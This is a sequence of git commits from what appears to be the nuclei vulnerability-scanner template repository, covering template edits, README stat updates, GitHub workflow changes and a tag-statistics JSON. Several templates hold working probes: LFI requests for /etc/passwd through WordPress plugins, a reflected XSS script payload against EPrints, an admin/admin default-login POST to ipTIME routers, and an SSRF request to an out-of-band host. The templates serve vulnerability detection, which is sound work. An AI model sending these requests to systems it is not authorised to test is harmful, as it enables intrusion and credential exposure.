a/cves/2019/CVE-2019-18394.yaml b/cves/2019/CVE-2019-18394.yaml index 5bd99f4581..853e3f08d8 100644 --- a/cves/2019/CVE-2019-18394.yaml +++ b/cves/2019/CVE-2019-18394.yaml @@ -8,13 +8,15 @@ info: refrense: | - https://swarm.ptsecurity.com/openfire-admin-console/ - https://github.com/igniterealtime/Openfire/pull/1497 - tags: cve,cve2019,ssrf + tags: cve,cve2019,ssrf,openfire,oob requests: - method: GET path: - - "{{BaseURL}}/getFavicon?host=burpcollaborator.net" + - "{{BaseURL}}/getFavicon?host=http://{{interactsh-url}}" + matchers: - type: word + part: interactsh_protocol # Confirms the HTTP Interaction words: - -

    Burp Collaborator Server

    + - "http" \ No newline at end of file From 96d7a23ccde9984f2c29d0679f6cd246da4117f8 Mon Sep 17 00:00:00 2001 From: sandeep Date: Mon, 19 Jul 2021 18:15:42 +0530 Subject: [PATCH 0887/4083] removed duplicate --- .../wordpress/wp-mail-masta-lfi.yaml | 19 ------------------- 1 file changed, 19 deletions(-) delete mode 100644 vulnerabilities/wordpress/wp-mail-masta-lfi.yaml diff --git a/vulnerabilities/wordpress/wp-mail-masta-lfi.yaml b/vulnerabilities/wordpress/wp-mail-masta-lfi.yaml deleted file mode 100644 index 7706b5236e..0000000000 --- a/vulnerabilities/wordpress/wp-mail-masta-lfi.yaml +++ /dev/null @@ -1,19 +0,0 @@ -id: wp-mail-masta-lfi - -info: - name: WordPress Plugin Mail Masta 1.0 - Local File Inclusion - author: 0x240x23elu - severity: high - reference: https://www.exploit-db.com/exploits/40290 - tags: wordpress,wp-plugin,lfi - -requests: - - method: GET - path: - - "{{BaseURL}}/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/etc/passwd" - - matchers: - - type: regex - regex: - - "root:[x*]:0:0:" - part: body \ No newline at end of file From c22924c1ba5d67843bd3fe6eb1040d3e9478055b Mon Sep 17 00:00:00 2001 From: sandeep Date: Mon, 19 Jul 2021 18:17:12 +0530 Subject: [PATCH 0888/4083] misc updates --- cves/2016/CVE-2016-10956.yaml | 2 +- cves/2018/CVE-2018-16299.yaml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/cves/2016/CVE-2016-10956.yaml b/cves/2016/CVE-2016-10956.yaml index 4c48c18707..b59c24dc22 100644 --- a/cves/2016/CVE-2016-10956.yaml +++ b/cves/2016/CVE-2016-10956.yaml @@ -2,7 +2,7 @@ id: CVE-2016-10956 info: name: Mail Masta 1.0 - Unauthenticated Local File Inclusion (LFI) - author: daffainfo + author: daffainfo,0x240x23elu severity: high description: The mail-masta plugin 1.0 for WordPress has local file inclusion in count_of_send.php and csvexport.php. reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-10956 diff --git a/cves/2018/CVE-2018-16299.yaml b/cves/2018/CVE-2018-16299.yaml index 5741f9b96f..4e6d0331b4 100644 --- a/cves/2018/CVE-2018-16299.yaml +++ b/cves/2018/CVE-2018-16299.yaml @@ -2,7 +2,7 @@ id: CVE-2018-16299 info: name: WordPress Plugin Localize My Post 1.0 - LFI - author: 0x_Akoko + author: 0x_Akoko,0x240x23elu severity: high reference: https://www.exploit-db.com/exploits/45439 tags: wordpress,cve2018,cve,lfi From 7a99c2db48cb047d786bd9af44db6f9e5157a84d Mon Sep 17 00:00:00 2001 From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com> Date: Mon, 19 Jul 2021 19:47:31 +0700 Subject: [PATCH 0889/4083] Rename to CVE-2018-16283 --- .../2018/CVE-2018-16283.yaml | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) rename vulnerabilities/wordpress/wp-wechat-broadcast-lfi.yaml => cves/2018/CVE-2018-16283.yaml (83%) diff --git a/vulnerabilities/wordpress/wp-wechat-broadcast-lfi.yaml b/cves/2018/CVE-2018-16283.yaml similarity index 83% rename from vulnerabilities/wordpress/wp-wechat-broadcast-lfi.yaml rename to cves/2018/CVE-2018-16283.yaml index c4f8d1e2f5..3a4f4be80f 100644 --- a/vulnerabilities/wordpress/wp-wechat-broadcast-lfi.yaml +++ b/cves/2018/CVE-2018-16283.yaml @@ -1,11 +1,11 @@ -id: wp-wechat-broadcast-lfi +id: CVE-2018-16283 info: name: WordPress Plugin Wechat Broadcast 1.2.0 - Local File Inclusion author: 0x240x23elu severity: high reference: https://www.exploit-db.com/exploits/45438 - tags: wordpress,wp-plugin,lfi + tags: cve,cve2018,wordpress,wp-plugin,lfi requests: - method: GET @@ -16,4 +16,4 @@ requests: - type: regex regex: - "root:[x*]:0:0:" - part: body \ No newline at end of file + part: body From b44b0d2a42690e42c48caa02b565e93a0a270967 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 19 Jul 2021 12:48:24 +0000 Subject: [PATCH 0890/4083] Auto Update README [Mon Jul 19 12:48:24 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index ce8b9da810..4c8d48b7ab 100644 --- a/README.md +++ b/README.md @@ -38,13 +38,13 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- | -| cves | 467 | vulnerabilities | 236 | exposed-panels | 202 | +| cves | 467 | vulnerabilities | 235 | exposed-panels | 202 | | takeovers | 70 | exposures | 116 | technologies | 125 | | misconfiguration | 77 | workflows | 33 | miscellaneous | 27 | | default-logins | 44 | file | 42 | dns | 10 | | fuzzing | 10 | helpers | 9 | iot | 18 | -**134 directories, 1605 files**. +**134 directories, 1604 files**. From ffce401c2328429a0d9f22cb7274ef0f17101ae3 Mon Sep 17 00:00:00 2001 From: Sandeep Singh Date: Mon, 19 Jul 2021 18:22:19 +0530 Subject: [PATCH 0891/4083] Update CVE-2018-16283.yaml --- cves/2018/CVE-2018-16283.yaml | 6 ++++-- 1 file changed, 4 insertions(+), 2 deletions(-) diff --git a/cves/2018/CVE-2018-16283.yaml b/cves/2018/CVE-2018-16283.yaml index 3a4f4be80f..72d62b3cdf 100644 --- a/cves/2018/CVE-2018-16283.yaml +++ b/cves/2018/CVE-2018-16283.yaml @@ -3,8 +3,10 @@ id: CVE-2018-16283 info: name: WordPress Plugin Wechat Broadcast 1.2.0 - Local File Inclusion author: 0x240x23elu - severity: high - reference: https://www.exploit-db.com/exploits/45438 + severity: critical + reference: | + - https://nvd.nist.gov/vuln/detail/CVE-2018-16283 + - https://www.exploit-db.com/exploits/45438 tags: cve,cve2018,wordpress,wp-plugin,lfi requests: From 6fd45648813bb97da7bfca5fee1b951fef362d82 Mon Sep 17 00:00:00 2001 From: GwanYeong Kim Date: Mon, 19 Jul 2021 21:52:56 +0900 Subject: [PATCH 0892/4083] Create iptime-default-login.yaml Signed-off-by: GwanYeong Kim --- .../iptime/iptime-default-login.yaml | 32 +++++++++++++++++++ 1 file changed, 32 insertions(+) create mode 100644 default-logins/iptime/iptime-default-login.yaml diff --git a/default-logins/iptime/iptime-default-login.yaml b/default-logins/iptime/iptime-default-login.yaml new file mode 100644 index 0000000000..9924878032 --- /dev/null +++ b/default-logins/iptime/iptime-default-login.yaml @@ -0,0 +1,32 @@ +id: iptime-default-login + +info: + name: ipTIME Default Login + author: gy741 + severity: high + tags: iptime,default-login + +requests: + - raw: + - | + POST /sess-bin/login_handler.cgi HTTP/1.1 + Host: {{Hostname}} + User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36 + Referer: http://{{Hostname}}/sess-bin/login_session.cgi + Connection: close + + username=admin&passwd=admin + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "setCookie" + - "efm_session_id" + - "login.cgi" + part: body + condition: and From bd48ea76cb40633c13ee1eb725eab7d7808434c8 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 19 Jul 2021 12:53:32 +0000 Subject: [PATCH 0893/4083] Auto Update README [Mon Jul 19 12:53:32 UTC 2021] :robot: --- README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/README.md b/README.md index 4c8d48b7ab..bfb7b06b0d 100644 --- a/README.md +++ b/README.md @@ -38,7 +38,7 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- | -| cves | 467 | vulnerabilities | 235 | exposed-panels | 202 | +| cves | 468 | vulnerabilities | 234 | exposed-panels | 202 | | takeovers | 70 | exposures | 116 | technologies | 125 | | misconfiguration | 77 | workflows | 33 | miscellaneous | 27 | | default-logins | 44 | file | 42 | dns | 10 | From 39acc90454651d051e9c5a8d17859b1e1401038a Mon Sep 17 00:00:00 2001 From: Geeknik Labs <466878+geeknik@users.noreply.github.com> Date: Mon, 19 Jul 2021 08:34:21 -0500 Subject: [PATCH 0894/4083] Create CVE-2021-26475.yaml CVE-2021-26475 -- EPrints 3.4.2 exposes a reflected XSS opportunity in the via a cgi/cal URI. --- cves/2021/CVE-2021-26475.yaml | 24 ++++++++++++++++++++++++ 1 file changed, 24 insertions(+) create mode 100644 cves/2021/CVE-2021-26475.yaml diff --git a/cves/2021/CVE-2021-26475.yaml b/cves/2021/CVE-2021-26475.yaml new file mode 100644 index 0000000000..bc9d4332f5 --- /dev/null +++ b/cves/2021/CVE-2021-26475.yaml @@ -0,0 +1,24 @@ +id: CVE-2021-26475 + +info: + name: EPrints 3.4.2 XSS + author: geeknik + description: EPrints 3.4.2 exposes a reflected XSS opportunity in the via a cgi/cal URI. + reference: https://github.com/grymer/CVE/blob/master/eprints_security_review.pdf + severity: medium + tags: cve,cve2021,xss,eprints + +requests: + - method: GET + path: + - "{{BaseURL}}/cgi/cal?year=2021%3C/title%3E%3Cscript%3Ealert(%27{{randstr}}%27)%3C/script%3E" + + matchers-condition: and + matchers: + - type: word + words: + - "" + - type: word + part: header + words: + - "text/html" From 4fd805743f76d944ac64298cddf8d4e347ac286c Mon Sep 17 00:00:00 2001 From: sandeep Date: Mon, 19 Jul 2021 19:28:18 +0530 Subject: [PATCH 0895/4083] Added template stats automation --- .github/workflows/templates-stats.yml | 57 +++++++++++++++++++++++++++ 1 file changed, 57 insertions(+) create mode 100644 .github/workflows/templates-stats.yml diff --git a/.github/workflows/templates-stats.yml b/.github/workflows/templates-stats.yml new file mode 100644 index 0000000000..76979791ea --- /dev/null +++ b/.github/workflows/templates-stats.yml @@ -0,0 +1,57 @@ +name: Templates Stats + +on: + create: + tags: + - v* + workflow_dispatch: + +jobs: + build: + runs-on: ubuntu-latest + steps: + - name: Checkout Repo + uses: actions/checkout@master + + - name: Setup golang + uses: actions/setup-go@v2 + with: + go-version: 1.14 + + - name: Cache Go + id: cache-go + uses: actions/cache@v2 + with: + path: /home/runner/go + key: ${{ runner.os }}-go + + - name: Installing Template Stats + if: steps.cache-go.outputs.cache-hit != 'true' + env: + GO111MODULE: on + run: | + go get -v github.com/projectdiscovery/templates-stats + shell: bash + + - name: Markdown Stats + run: | + templates-stats -output TEMPLATES-STATS.md -path . + shell: bash + + - name: JSON Stats + run: | + templates-stats -output TEMPLATES-STATS.json -json -path . + shell: bash + + - name: Commit files + run: | + git config --local user.email "action@github.com" + git config --local user.name "GitHub Action" + git commit -m "Auto Generated Templates Stats [$(date)] :robot:" -a + + - name: Push changes + if: steps.update-readme.outputs.changes > 0 + uses: ad-m/github-push-action@master + with: + github_token: ${{ secrets.GITHUB_TOKEN }} + branch: ${{ github.ref }} \ No newline at end of file From 05a088ff64af9344d4296cadd4fba8d7ffd0c028 Mon Sep 17 00:00:00 2001 From: sandeep Date: Mon, 19 Jul 2021 19:28:59 +0530 Subject: [PATCH 0896/4083] Stats updates on tag release --- .github/workflows/update-readme.yml | 3 --- 1 file changed, 3 deletions(-) diff --git a/.github/workflows/update-readme.yml b/.github/workflows/update-readme.yml index dccc5d3db2..f837ccfd4d 100644 --- a/.github/workflows/update-readme.yml +++ b/.github/workflows/update-readme.yml @@ -1,9 +1,6 @@ name: 📝 Readme Update on: - push: - branches: - - master create: tags: - v* From b409ff4f30478e78da7c01274ac7c0c1e5e7b1c4 Mon Sep 17 00:00:00 2001 From: sandeep Date: Mon, 19 Jul 2021 19:30:28 +0530 Subject: [PATCH 0897/4083] Update templates-stats.yml --- .github/workflows/templates-stats.yml | 1 - 1 file changed, 1 deletion(-) diff --git a/.github/workflows/templates-stats.yml b/.github/workflows/templates-stats.yml index 76979791ea..c93b9a2cf0 100644 --- a/.github/workflows/templates-stats.yml +++ b/.github/workflows/templates-stats.yml @@ -26,7 +26,6 @@ jobs: key: ${{ runner.os }}-go - name: Installing Template Stats - if: steps.cache-go.outputs.cache-hit != 'true' env: GO111MODULE: on run: | From 319e3f0ad78b61ac25ffc3017789afde634f55e3 Mon Sep 17 00:00:00 2001 From: Sandeep Singh Date: Mon, 19 Jul 2021 19:35:26 +0530 Subject: [PATCH 0898/4083] Update templates-stats.yml --- .github/workflows/templates-stats.yml | 9 +-------- 1 file changed, 1 insertion(+), 8 deletions(-) diff --git a/.github/workflows/templates-stats.yml b/.github/workflows/templates-stats.yml index c93b9a2cf0..b627beb344 100644 --- a/.github/workflows/templates-stats.yml +++ b/.github/workflows/templates-stats.yml @@ -18,13 +18,6 @@ jobs: with: go-version: 1.14 - - name: Cache Go - id: cache-go - uses: actions/cache@v2 - with: - path: /home/runner/go - key: ${{ runner.os }}-go - - name: Installing Template Stats env: GO111MODULE: on @@ -53,4 +46,4 @@ jobs: uses: ad-m/github-push-action@master with: github_token: ${{ secrets.GITHUB_TOKEN }} - branch: ${{ github.ref }} \ No newline at end of file + branch: ${{ github.ref }} From ac5046270de249713122db178dfeff292d8655c8 Mon Sep 17 00:00:00 2001 From: sandeep Date: Mon, 19 Jul 2021 19:39:22 +0530 Subject: [PATCH 0899/4083] minor update --- .github/workflows/templates-stats.yml | 9 +++++++++ 1 file changed, 9 insertions(+) diff --git a/.github/workflows/templates-stats.yml b/.github/workflows/templates-stats.yml index b627beb344..c0a0472631 100644 --- a/.github/workflows/templates-stats.yml +++ b/.github/workflows/templates-stats.yml @@ -18,6 +18,13 @@ jobs: with: go-version: 1.14 + - name: Cache Go + id: cache-go + uses: actions/cache@v2 + with: + path: /home/runner/go + key: ${{ runner.os }}-go + - name: Installing Template Stats env: GO111MODULE: on @@ -37,6 +44,8 @@ jobs: - name: Commit files run: | + git add TEMPLATES-STATS.md + git add TEMPLATES-STATS.json git config --local user.email "action@github.com" git config --local user.name "GitHub Action" git commit -m "Auto Generated Templates Stats [$(date)] :robot:" -a From e82c972a5e0305da116fff0f70b211695ccdc4f0 Mon Sep 17 00:00:00 2001 From: sandeep Date: Mon, 19 Jul 2021 19:40:54 +0530 Subject: [PATCH 0900/4083] minor update --- .github/workflows/templates-stats.yml | 1 - 1 file changed, 1 deletion(-) diff --git a/.github/workflows/templates-stats.yml b/.github/workflows/templates-stats.yml index c0a0472631..214cf997e7 100644 --- a/.github/workflows/templates-stats.yml +++ b/.github/workflows/templates-stats.yml @@ -51,7 +51,6 @@ jobs: git commit -m "Auto Generated Templates Stats [$(date)] :robot:" -a - name: Push changes - if: steps.update-readme.outputs.changes > 0 uses: ad-m/github-push-action@master with: github_token: ${{ secrets.GITHUB_TOKEN }} From 2f59da0308468dfe70d7a457735769682a11227b Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 19 Jul 2021 14:11:31 +0000 Subject: [PATCH 0901/4083] Auto Generated Templates Stats [Mon Jul 19 14:11:31 UTC 2021] :robot: --- TEMPLATES-STATS.json | 1 + TEMPLATES-STATS.md | 602 +++++++++++++++++++++++++++++++++++++++++++ 2 files changed, 603 insertions(+) create mode 100644 TEMPLATES-STATS.json create mode 100644 TEMPLATES-STATS.md diff --git a/TEMPLATES-STATS.json b/TEMPLATES-STATS.json new file mode 100644 index 0000000000..5f49fff958 --- /dev/null +++ b/TEMPLATES-STATS.json @@ -0,0 +1 @@ +{"tags":[{"name":"cve","count":462},{"name":"panel","count":201},{"name":"xss","count":168},{"name":"wordpress","count":166},{"name":"rce","count":161},{"name":"exposure","count":154},{"name":"cve2020","count":135},{"name":"lfi","count":127},{"name":"wp-plugin","count":111},{"name":"cve2019","count":82},{"name":"config","count":81},{"name":"tech","count":72},{"name":"takeover","count":71},{"name":"cve2021","count":70},{"name":"token","count":63},{"name":"cve2018","count":61},{"name":"apache","count":60},{"name":"default-login","count":45},{"name":"cve2017","count":43},{"name":"file","count":42},{"name":"unauth","count":39},{"name":"network","count":32},{"name":"iot","count":32},{"name":"oracle","count":29},{"name":"sqli","count":29},{"name":"workflow","count":28},{"name":"misc","count":27},{"name":"atlassian","count":26},{"name":"jira","count":25},{"name":"ssrf","count":25},{"name":"logs","count":24},{"name":"oob","count":24},{"name":"disclosure","count":24},{"name":"redirect","count":20},{"name":"aem","count":18},{"name":"listing","count":15},{"name":"cisco","count":15},{"name":"cve2016","count":14},{"name":"sap","count":14},{"name":"misconfig","count":13},{"name":"debug","count":13},{"name":"cve2015","count":13},{"name":"struts","count":13},{"name":"weblogic","count":12},{"name":"fuzz","count":12},{"name":"android","count":12},{"name":"auth-bypass","count":11},{"name":"springboot","count":11},{"name":"zoho","count":11},{"name":"dns","count":11},{"name":"cve2011","count":10},{"name":"devops","count":10},{"name":"magento","count":9},{"name":"dlink","count":9},{"name":"jenkins","count":9},{"name":"cve2012","count":9},{"name":"cve2013","count":8},{"name":"airflow","count":8},{"name":"cnvd","count":8},{"name":"aws","count":8},{"name":"gitlab","count":8},{"name":"ftp","count":8},{"name":"php","count":8},{"name":"adobe","count":8},{"name":"cve2014","count":7},{"name":"vmware","count":7},{"name":"scada","count":7},{"name":"joomla","count":7},{"name":"nginx","count":6},{"name":"rails","count":6},{"name":"google","count":6},{"name":"cms","count":6},{"name":"citrix","count":6},{"name":"rconfig","count":6},{"name":"backup","count":6},{"name":"api","count":6},{"name":"xxe","count":6},{"name":"iis","count":5},{"name":"dell","count":5},{"name":"solr","count":5},{"name":"ruijie","count":5},{"name":"lucee","count":5},{"name":"login","count":5},{"name":"ssti","count":5},{"name":"laravel","count":5},{"name":"confluence","count":5},{"name":"java","count":5},{"name":"circarlife","count":5},{"name":"headless","count":5},{"name":"phpmyadmin","count":5},{"name":"jetty","count":5},{"name":"drupal","count":5},{"name":"ibm","count":4},{"name":"solarwinds","count":4},{"name":"django","count":4},{"name":"moodle","count":4},{"name":"thinkcmf","count":4},{"name":"cve2009","count":4},{"name":"magmi","count":4},{"name":"nodejs","count":4},{"name":"docker","count":4},{"name":"vpn","count":4},{"name":"elastic","count":4},{"name":"router","count":4},{"name":"hongdian","count":4},{"name":"netgear","count":4},{"name":"traversal","count":4},{"name":"jolokia","count":4},{"name":"thinkphp","count":4},{"name":"tomcat","count":4},{"name":"artifactory","count":4},{"name":"asp","count":4},{"name":"samsung","count":4},{"name":"fileupload","count":4},{"name":"webserver","count":4},{"name":"kafka","count":3},{"name":"crlf","count":3},{"name":"grafana","count":3},{"name":"fpd","count":3},{"name":"oa","count":3},{"name":"ofbiz","count":3},{"name":"r-seenet","count":3},{"name":"springcloud","count":3},{"name":"log","count":3},{"name":"ebs","count":3},{"name":"vbulletin","count":3},{"name":"caucho","count":3},{"name":"deserialization","count":3},{"name":"microstrategy","count":3},{"name":"git","count":3},{"name":"backups","count":3},{"name":"bypass","count":3},{"name":"kubernetes","count":3},{"name":"terramaster","count":3},{"name":"slack","count":3},{"name":"amazon","count":3},{"name":"resin","count":3},{"name":"lfr","count":3},{"name":"windows","count":3},{"name":"mongodb","count":3},{"name":"ssh","count":3},{"name":"nacos","count":3},{"name":"fanruan","count":3},{"name":"dedecms","count":3},{"name":"openssh","count":3},{"name":"printer","count":3},{"name":"nosqli","count":3},{"name":"odoo","count":2},{"name":"hpe","count":2},{"name":"prometheus","count":2},{"name":"glassfish","count":2},{"name":"jellyfin","count":2},{"name":"smtp","count":2},{"name":"nagios","count":2},{"name":"oauth","count":2},{"name":"service","count":2},{"name":"kibana","count":2},{"name":"ecology","count":2},{"name":"cve2008","count":2},{"name":"sonicwall","count":2},{"name":"vrealize","count":2},{"name":"couchdb","count":2},{"name":"injection","count":2},{"name":"smb","count":2},{"name":"exposures","count":2},{"name":"plesk","count":2},{"name":"jboss","count":2},{"name":"strapi","count":2},{"name":"mail","count":2},{"name":"trixbox","count":2},{"name":"mida","count":2},{"name":"zabbix","count":2},{"name":"xxljob","count":2},{"name":"waf","count":2},{"name":"pega","count":2},{"name":"hashicorp","count":2},{"name":"keycloak","count":2},{"name":"natshell","count":2},{"name":"maian","count":2},{"name":"emerge","count":2},{"name":"bigip","count":2},{"name":"yapi","count":2},{"name":"sonarqube","count":2},{"name":"bitrix","count":2},{"name":"nextjs","count":2},{"name":"idrac","count":2},{"name":"spark","count":2},{"name":"rockethchat","count":2},{"name":"shellshock","count":2},{"name":"frp","count":2},{"name":"chamilo","count":2},{"name":"nexus","count":2},{"name":"voipmonitor","count":2},{"name":"httpd","count":2},{"name":"flir","count":2},{"name":"rstudio","count":2},{"name":"activemq","count":2},{"name":"sharepoint","count":2},{"name":"ucmdb","count":2},{"name":"coldfusion","count":2},{"name":"huawei","count":2},{"name":"dos","count":2},{"name":"wordfence","count":2},{"name":"rockmongo","count":2},{"name":"splunk","count":2},{"name":"microsoft","count":2},{"name":"cache","count":2},{"name":"openam","count":2},{"name":"kentico","count":2},{"name":"zhiyuan","count":2},{"name":"globalprotect","count":2},{"name":"leak","count":2},{"name":"hjtcloud","count":2},{"name":"openfire","count":2},{"name":"saltstack","count":2},{"name":"seeyon","count":2},{"name":"hp","count":2},{"name":"proxy","count":2},{"name":"fortios","count":2},{"name":"paloalto","count":2},{"name":"showdoc","count":2},{"name":"intrusive","count":2},{"name":"telerik","count":2},{"name":"webcam","count":2},{"name":"icewarp","count":2},{"name":"bash","count":1},{"name":"hadoop","count":1},{"name":"emc","count":1},{"name":"dom","count":1},{"name":"mongo","count":1},{"name":"landrayoa","count":1},{"name":"monitorix","count":1},{"name":"webui","count":1},{"name":"darkstat","count":1},{"name":"rdp","count":1},{"name":"wildfly","count":1},{"name":"zenario","count":1},{"name":"triconsole","count":1},{"name":"jmx","count":1},{"name":"wso2","count":1},{"name":"lotuscms","count":1},{"name":"klog","count":1},{"name":"embedthis","count":1},{"name":"linkedin","count":1},{"name":"faraday","count":1},{"name":"dvwa","count":1},{"name":"mcafee","count":1},{"name":"druid","count":1},{"name":"smartsense","count":1},{"name":"zeroshell","count":1},{"name":"openrestry","count":1},{"name":"rsyncd","count":1},{"name":"alibaba","count":1},{"name":"fastcgi","count":1},{"name":"zookeeper","count":1},{"name":"optiLink","count":1},{"name":"calendarix","count":1},{"name":"netis","count":1},{"name":"rhymix","count":1},{"name":"panabit","count":1},{"name":"livezilla","count":1},{"name":"nuxeo","count":1},{"name":"targa","count":1},{"name":"ems","count":1},{"name":"bullwark","count":1},{"name":"mediumish","count":1},{"name":"firebase","count":1},{"name":"mantisbt","count":1},{"name":"opensns","count":1},{"name":"netdata","count":1},{"name":"kubeflow","count":1},{"name":"nedi","count":1},{"name":"node","count":1},{"name":"fiori","count":1},{"name":"blind","count":1},{"name":"spectracom","count":1},{"name":"aura","count":1},{"name":"svnserve","count":1},{"name":"crm","count":1},{"name":"primetek","count":1},{"name":"lanproxy","count":1},{"name":"svn","count":1},{"name":"ioncube","count":1},{"name":"esmtp","count":1},{"name":"yii","count":1},{"name":"sitecore","count":1},{"name":"sqlite","count":1},{"name":"vscode","count":1},{"name":"cocoon","count":1},{"name":"rubedo","count":1},{"name":"htmli","count":1},{"name":"jnoj","count":1},{"name":"phpunit","count":1},{"name":"rmc","count":1},{"name":"etouch","count":1},{"name":"nexusdb","count":1},{"name":"totaljs","count":1},{"name":"gitlist","count":1},{"name":"wamp","count":1},{"name":"jquery","count":1},{"name":"mailchimp","count":1},{"name":"phpinfo","count":1},{"name":"wp-theme","count":1},{"name":"fedora","count":1},{"name":"grav","count":1},{"name":"krweb","count":1},{"name":"timesheet","count":1},{"name":"plc","count":1},{"name":"varnish","count":1},{"name":"harbor","count":1},{"name":"turbocrm","count":1},{"name":"bolt","count":1},{"name":"discord","count":1},{"name":"geddy","count":1},{"name":"memcached","count":1},{"name":"hasura","count":1},{"name":"eyou","count":1},{"name":"npm","count":1},{"name":"axis","count":1},{"name":"fortiweb","count":1},{"name":"uwsgi","count":1},{"name":"interlib","count":1},{"name":"openstack","count":1},{"name":"sprintful","count":1},{"name":"jsf","count":1},{"name":"szhe","count":1},{"name":"bookstack","count":1},{"name":"goahead","count":1},{"name":"geutebruck","count":1},{"name":"episerver","count":1},{"name":"ntopng","count":1},{"name":"stem","count":1},{"name":"woocomernce","count":1},{"name":"wmt","count":1},{"name":"synnefo","count":1},{"name":"hortonworks","count":1},{"name":"jfrog","count":1},{"name":"ilo4","count":1},{"name":"ecom","count":1},{"name":"ec2","count":1},{"name":"huijietong","count":1},{"name":"yachtcontrol","count":1},{"name":"traefik","count":1},{"name":"tika","count":1},{"name":"zarafa","count":1},{"name":"email","count":1},{"name":"maccmsv10","count":1},{"name":"enum","count":1},{"name":"tapestry","count":1},{"name":"opencast","count":1},{"name":"trilithic","count":1},{"name":"idemia","count":1},{"name":"kerbynet","count":1},{"name":"alertmanager","count":1},{"name":"node-red-dashboard","count":1},{"name":"wifisky","count":1},{"name":"nps","count":1},{"name":"sidekiq","count":1},{"name":"xdcms","count":1},{"name":"favicon","count":1},{"name":"ueditor","count":1},{"name":"spf","count":1},{"name":"shopware","count":1},{"name":"cgi","count":1},{"name":"comodo","count":1},{"name":"checkpoint","count":1},{"name":"nordex","count":1},{"name":"powercreator","count":1},{"name":"wazuh","count":1},{"name":"gateone","count":1},{"name":"flash","count":1},{"name":"zm","count":1},{"name":"acme","count":1},{"name":"grails","count":1},{"name":"beanshell","count":1},{"name":"clave","count":1},{"name":"plone","count":1},{"name":"clusterengine","count":1},{"name":"blue-ocean","count":1},{"name":"haproxy","count":1},{"name":"keenetic","count":1},{"name":"cors","count":1},{"name":"wooyun","count":1},{"name":"servicedesk","count":1},{"name":"lancom","count":1},{"name":"cse","count":1},{"name":"finereport","count":1},{"name":"sentry","count":1},{"name":"ricoh","count":1},{"name":"ruby","count":1},{"name":"gridx","count":1},{"name":"cve2005","count":1},{"name":"circontrorl","count":1},{"name":"viewlinc","count":1},{"name":"javascript","count":1},{"name":"codeigniter","count":1},{"name":"wuzhicms","count":1},{"name":"drone","count":1},{"name":"subrion","count":1},{"name":"oscommerce","count":1},{"name":"scs","count":1},{"name":"adminer","count":1},{"name":"enumeration","count":1},{"name":"xiuno","count":1},{"name":"st","count":1},{"name":"sco","count":1},{"name":"mobileiron","count":1},{"name":"csod","count":1},{"name":"socomec","count":1},{"name":"itop","count":1},{"name":"phalcon","count":1},{"name":"dlogin","count":1},{"name":"liferay","count":1},{"name":"rmi","count":1},{"name":"parentlink","count":1},{"name":"linksys","count":1},{"name":"horde","count":1},{"name":"gogs","count":1},{"name":"mautic","count":1},{"name":"ssltls","count":1},{"name":"flink","count":1},{"name":"starttls","count":1},{"name":"javamelody","count":1},{"name":"seacms","count":1},{"name":"salesforce","count":1},{"name":"dompdf","count":1},{"name":"clockwatch","count":1},{"name":"mirai","count":1},{"name":"zend","count":1},{"name":"zmanda","count":1},{"name":"wavemaker","count":1},{"name":"pulsesecure","count":1},{"name":"fastapi","count":1},{"name":"floc","count":1},{"name":"ambari","count":1},{"name":"dotnetnuke","count":1},{"name":"circontrol","count":1},{"name":"fortigate","count":1},{"name":"openerp","count":1},{"name":"fortinet","count":1},{"name":"k8","count":1},{"name":"azure","count":1},{"name":"opm","count":1},{"name":"fortigates","count":1},{"name":"discourse","count":1},{"name":"mara","count":1},{"name":"payara","count":1},{"name":"tenda","count":1},{"name":"symfony","count":1},{"name":"linkerd","count":1},{"name":"biometrics","count":1},{"name":"acexy","count":1},{"name":"exchange","count":1},{"name":"alerta","count":1},{"name":"postgres","count":1},{"name":"diris","count":1},{"name":"rfi","count":1},{"name":"octoprint","count":1},{"name":"gloo","count":1},{"name":"74cms","count":1},{"name":"tamronos","count":1},{"name":"2014","count":1},{"name":"dvr","count":1},{"name":"bruteforce","count":1},{"name":"akamai","count":1},{"name":"zcms","count":1},{"name":"jsp","count":1},{"name":"zte","count":1},{"name":"swagger","count":1},{"name":"xml","count":1},{"name":"pacsone","count":1},{"name":"shopxo","count":1},{"name":"xff","count":1},{"name":"springframework","count":1},{"name":"pippoint","count":1},{"name":"postmessage","count":1},{"name":"webadmin","count":1},{"name":"webmodule-ee","count":1},{"name":"nc2","count":1},{"name":"realteo","count":1},{"name":"kyan","count":1},{"name":"upnp","count":1},{"name":"cloudflare","count":1},{"name":"domxss","count":1},{"name":"nuuo","count":1},{"name":"k8s","count":1},{"name":"plugin","count":1},{"name":"rabbitmq","count":1},{"name":"redis","count":1},{"name":"appweb","count":1},{"name":"tensorboard","count":1},{"name":"centos","count":1},{"name":"heroku","count":1},{"name":"thinkadmin","count":1},{"name":"majordomo2","count":1},{"name":"concrete","count":1},{"name":"cve2007","count":1},{"name":"db","count":1},{"name":"myucms","count":1},{"name":"mdb","count":1},{"name":"dotnet","count":1},{"name":"redwood","count":1},{"name":"zimbra","count":1},{"name":"csrf","count":1},{"name":"backdoor","count":1},{"name":"extractor","count":1},{"name":"glances","count":1},{"name":"landray","count":1},{"name":"portainer","count":1},{"name":"duomicms","count":1},{"name":"empirecms","count":1},{"name":"nette","count":1},{"name":"anchorcms","count":1},{"name":"mpsec","count":1},{"name":"avalanche","count":1},{"name":"webftp","count":1},{"name":"feifeicms","count":1},{